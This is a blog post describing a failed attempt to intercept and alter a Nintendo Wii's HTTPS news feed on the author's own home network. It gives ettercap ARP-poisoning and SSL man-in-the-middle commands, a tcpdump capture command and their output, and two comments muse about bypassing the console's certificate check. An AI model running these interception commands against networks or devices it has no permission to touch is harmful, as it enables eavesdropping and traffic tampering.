My Wii is more intelligent than me

Today I was thinking about playing with my Wii in a different way but finally it was me who was played :)

I wanted to intercept the connection my Wii establishes with the Nintendo server and modify the news stream so I could modify the headlines and show off in front of my girlfriend. Things you do a rainy Sunday afternoon…

First step: ARP poison both the Wii and the router to sniff the traffic.

root@bt:~# ettercap -T -q -i eth0 -M arp /192.168.1.1/ /192.168.1.254/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0… (Ethernet)

eth0 ->       2A:04:73:94:A6:0A      192.168.1.10     255.255.255.0

Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)…

* |==================================================>| 100.00 %

2 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.1.254 E8:4E:CE:10:6D:E6

GROUP 2 : 192.168.1.1 00:23:69:2F:C1:61
Starting Unified sniffing…

[…]

root@bt:~# tcpdump -i eth0 -nvX -s 0 -w wii.dmp host 192.168.1.254
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

[…]

Unfortunately all we get is a lot of HTTPS traffic (TLS v1 encrypted). Well I didn’t think that the Wii was going to send everything unecncrypted, did I? …

Next thought was to modify the attack in order to sniff the contents of the TLS session. Ettercap itself is able to perform this kind of SSL-man-in-the-middle attack.

From the ettercap man page:

SSL MITM ATTACK
       While performing the SSL mitm attack, ettercap substitutes the real ssl
       certificate with its own. The fake certificate is created  on  the  fly
       and  all  the fields are filled according to the real cert presented by
       the server. Only the issuer is modified and signed with the private key
       contained  in  the 'etter.sll.crt' file. If you want to use a different
       private key you have to regenerate this file.

This way, the attacking machine starts two SSL connections:

1. One with the server. This is a normal SSL connection, where we act as a client and use the public key presented in the server’s certificate to encrypt the data.

2. One with the client, where we impersonate the server using a fake (almost identical) certificate.

root@bt:~# ettercap -Tq -M arp:remote,oneway /192.168.1.254/ /192.168.1.1/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0… (Ethernet)

eth0 -> 2A:04:73:94:A6:0A 192.168.1.10 255.255.255.0

Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)…

* |==================================================>| 100.00 %

2 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.1.254 E8:4E:CE:10:6D:E6

GROUP 2 : 192.168.1.1 00:23:69:2F:C1:61
Starting Unified sniffing…

This trick usually works with humans because… well, because certificates and all this technology is a fucked up system and we are so used to invalid certificates and to click “Ok”.

But my Wii is more intelligent than me and must somehow check the fingerprint of the public key in the certificate. Everything I got was a error message on my TV explaining that the connection had failed :(

The traffic capture was of course way more verbose, you can see in the capture below how I present the fake certificate and my Wii answers with a Certificate Unknown error message (click to enlarge)

Bottom line, I couldn’t play but I’m happy the security of my Wii is taken seriously.

Thumbs up Nintendo!

Advertisements

2 thoughts on “My Wii is more intelligent than me

  1. Hey, it is cool to see that you are at least trying stuff like this. I thought it was an interesting idea. That SSL certificate is probably somewhere embedded on the hard drive in the wii. I bet you could find it if you really wanted to. I doubt they update it.

  2. Maybe we can force the Wii to accept any fingerprint.
    I could do it if you could find Nintendo’s fingerprint. (not sure for Wii channels, but at least for games)
    Contact me if you’re interested :)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s